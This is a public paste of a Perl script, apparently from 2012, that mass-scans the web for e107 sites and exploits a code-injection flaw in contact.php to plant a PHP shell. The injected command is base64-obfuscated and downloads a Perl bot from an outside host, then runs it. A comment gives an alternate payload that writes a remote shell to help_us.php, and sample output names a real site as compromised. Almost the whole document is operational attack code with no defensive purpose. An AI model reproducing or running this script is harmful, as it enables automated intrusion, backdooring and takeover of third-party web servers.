Don't like ads? PRO users don't see any ads ;-)
Public Pastes
Guest

Untitled

By: a guest on May 7th, 2012  |  syntax: None  |  size: 6.04 KB  |  hits: 20  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. #!/usr/bin/perl
  2. # Author: skpx
  3. # e107 mass scanner/shell uploader
  4. # http://www.exploit-db.com/exploits/12715
  5. #
  6. # Change it to whatever
  7. # passthru() command:
  8. # echo "tEStVulN";
  9. # uname -a;
  10. # php -r '$s=@file_get_contents("http://www.yucatekisimo.com/language/shell.txt");$f=@fopen("help_us.php","w");fputs($f,$s);fclose($f);';
  11. # echo "TesTvULn"
  12. #
  13. # If it prints the uname but not a shell match change the cmd to whatever (wget, curl, etc).
  14. #
  15. # http://www.omni-bot.de/e107/contact.php
  16. # [!] Site vulnerable...
  17. # Linux corwin 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 GNU/Linux
  18. # [!] PHP Shell: http://www.omni-bot.de/e107/help_us.php
  19. #
  20. use strict;
  21. use warnings;
  22. use LWP::UserAgent;
  23. use URI::Escape;
  24.     my @tld = qw { ad ae am as at az ba be bf
  25.     bg bi bj bs ca cat cd cf cg ch ci cl cm cn
  26.     co.bw co.ck co.cr co.id co.il co.in co.jp
  27.     co.ke co.kr co.ls com co.ma com.af com.ag
  28.     com.ai com.ar com.au com.bd com.bh com.bn
  29.     com.bo com.br com.by com.bz com.co com.cu
  30.     com.do com.ec com.eg com.et com.fj com.gh
  31.     com.gi com.gt com.hk com.jm com.kh com.kw
  32.     com.lb com.ly com.mt com.mx com.my com.na
  33.     com.nf com.ng com.ni com.np com.om com.pa
  34.     com.pe com.ph com.pk com.pr com.py com.qa
  35.     com.sa com.sb com.sg com.sl com.sv com.tj
  36.     com.tr com.tw com.ua com.uy com.vc com.vn
  37.     co.mz co.nz co.th co.tz co.ug co.uk co.uz
  38.     co.ve co.vi co.za co.zm co.zw cz de dj dk
  39.     dm dz ee es fi fm fr ga ge gg gl gm gp gr
  40.     gy hn hr ht hu ie im is it it.ao je jo kg
  41.     ki kz la li lk lt lu lv md me mg mk ml mn
  42.     ms mu mv mw ne nl no nr nu pl pn ps pt ro
  43.     rs ru rw sc se sh si sk sm sn st td tg tk
  44.     tl tm to tt vg vu ws };
  45.  
  46.     my $term = shift;
  47.     my $rand_tld = rand($#tld);
  48.  
  49. my $dork  = "\"Powered by e107\"+".$tld[$rand_tld];
  50. my $match = "AtlantiQ";
  51. my $cmd   = "shell_exec(base64_decode(\"d2dldCBodHRwOi8venVvLnBvZGdvcnoub3JnL3p1by9zaGIucGwgLU8gL3RtcC9ibztwZXJsIC90bXAvYm8=\"));";
  52. my $log   = "e107-rce-sites.txt";
  53.  
  54. google_search($dork);
  55.  
  56. sub google_search {
  57.  
  58.     # http://www.google.com/supported_domains
  59.     my @tld = qw { ad ae am as at az ba be bf
  60.     bg bi bj bs ca cat cd cf cg ch ci cl cm cn
  61.     co.bw co.ck co.cr co.id co.il co.in co.jp
  62.     co.ke co.kr co.ls com co.ma com.af com.ag
  63.     com.ai com.ar com.au com.bd com.bh com.bn
  64.     com.bo com.br com.by com.bz com.co com.cu
  65.     com.do com.ec com.eg com.et com.fj com.gh
  66.     com.gi com.gt com.hk com.jm com.kh com.kw
  67.     com.lb com.ly com.mt com.mx com.my com.na
  68.     com.nf com.ng com.ni com.np com.om com.pa
  69.     com.pe com.ph com.pk com.pr com.py com.qa
  70.     com.sa com.sb com.sg com.sl com.sv com.tj
  71.     com.tr com.tw com.ua com.uy com.vc com.vn
  72.     co.mz co.nz co.th co.tz co.ug co.uk co.uz
  73.     co.ve co.vi co.za co.zm co.zw cz de dj dk
  74.     dm dz ee es fi fm fr ga ge gg gl gm gp gr
  75.     gy hn hr ht hu ie im is it it.ao je jo kg
  76.     ki kz la li lk lt lu lv md me mg mk ml mn
  77.     ms mu mv mw ne nl no nr nu pl pn ps pt ro
  78.     rs ru rw sc se sh si sk sm sn st td tg tk
  79.     tl tm to tt vg vu ws };
  80.  
  81.     my $term = shift;
  82.     my $rand_tld = rand($#tld);
  83.     my $inc = 10;
  84.     my $maxpages = 1024;
  85.     my @links;
  86.     for (my $pagenum = 0;$pagenum <= $maxpages;$pagenum += $inc) {
  87.         my $url = "http://www.google.".$tld[$rand_tld]."/search?q=".uri_escape($term)."&num=100&filter=0&start=".$pagenum;
  88.         my $query = send_query($url);
  89.         while ($query =~ m!href="(https?:\/\/[^>"]*)"!g) {
  90.             if ($1 !~ m!(google|googleusercontent)!) {
  91.                 my $rawlink = $1;
  92.                 my @process=process_links($rawlink);
  93.                 push(@links, @process);                
  94.             }
  95.         } sleep(2);
  96.     } return @links;
  97. }
  98.  
  99. sub send_query {
  100.  
  101.     my $url = shift;
  102.     my $ua = LWP::UserAgent->new or die;
  103.     $ua->agent('NULL');
  104.     $ua->timeout(10);
  105.  
  106.     my $req = HTTP::Request->new(GET => $url);
  107.     my $res = $ua->request($req);
  108.  
  109.     print $url . "\n";
  110.     return $res->content;
  111. }
  112.  
  113. sub process_links {
  114.  
  115.     my @links = shift;
  116.     my @xplurl;
  117.         foreach my $inc (@links) {
  118.         $inc =~ s!%3a!:!gi;
  119.         $inc =~ s!%3f!\/!gi;
  120.         if ($inc =~ m!e107_plugins!g) {
  121.             $inc =~ s!(e107_plugins)[^A-Za-z0-9].*$!!g;
  122.             push(@xplurl, $inc);
  123.         } else {
  124.             $inc =~ s!(https?:\/\/[^\/]+\/?)[^\s]+!$1!;
  125.             push(@xplurl,$inc);
  126.         }
  127.     } exploit_host(@xplurl);
  128. }
  129.  
  130. sub exploit_host {
  131.  
  132.     my @host = shift;
  133.     foreach my $inc (@host) {  
  134.         my $ua = LWP::UserAgent->new or die;
  135.         $ua->agent('Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)');
  136.         $ua->timeout(10);
  137.        
  138.         my $xpl = $inc . "/contact.php";
  139.         $xpl =~ s/\/\/contact.php/\/contact.php/g;
  140.         my $req = HTTP::Request->new(POST => $xpl);
  141.         $req->content_type('application/x-www-form-urlencoded');
  142.         $req->content("send-contactus=1&author_name=%5Bphp%5D" .$cmd. "%3Bdie%28%29%3B%5B%2Fphp%5D");
  143.        
  144.         my $res = $ua->request($req);
  145.         print $xpl . "\n";
  146.         my $cont = $res->content;
  147.         if ($cont =~ m!tEStVulN\n(.*)!g) {
  148.             my $uname = $1;
  149.             print "[!] Site vulnerable...\n";
  150.             print $uname . "\n";
  151.             # Write to logfile
  152.             open my $lh, '>>', $log or die $!;
  153.             print $lh "$xpl\n";
  154.             print $lh "$uname\n";
  155.             print $lh "-" x 35 . "\n";
  156.             close $lh or die $!;
  157.         } check_shell($xpl);
  158.     } sleep(1);
  159. }
  160.  
  161. sub check_shell {
  162.  
  163.     my $gotsh = shift;
  164.     $gotsh =~ s!contact\.php!help_us\.php!;
  165.  
  166.     my $ua = LWP::UserAgent->new or die;
  167.     $ua->agent('Mozilla/4.76 [ru] (X11; U; SunOS 5.7 sun4u)');
  168.     $ua->timeout(10);
  169.  
  170.     my $surl = $gotsh;
  171.     my $req = HTTP::Request->new(GET => $surl);
  172.  
  173.     my $res = $ua->request($req);
  174.     my $cont = $res->content;
  175.     if ($cont =~ m!$match!) {
  176.         print "[!] PHP Shell: " .$surl. "\n";
  177.         # Write to logfile
  178.         open my $lh, '>>', $log or die $!;
  179.         print $lh "$surl\n";
  180.         print $lh "-" x 35 . "\n";
  181.         close $lh or die $!;
  182.     }
  183. }
create a new version of this paste RAW Paste Data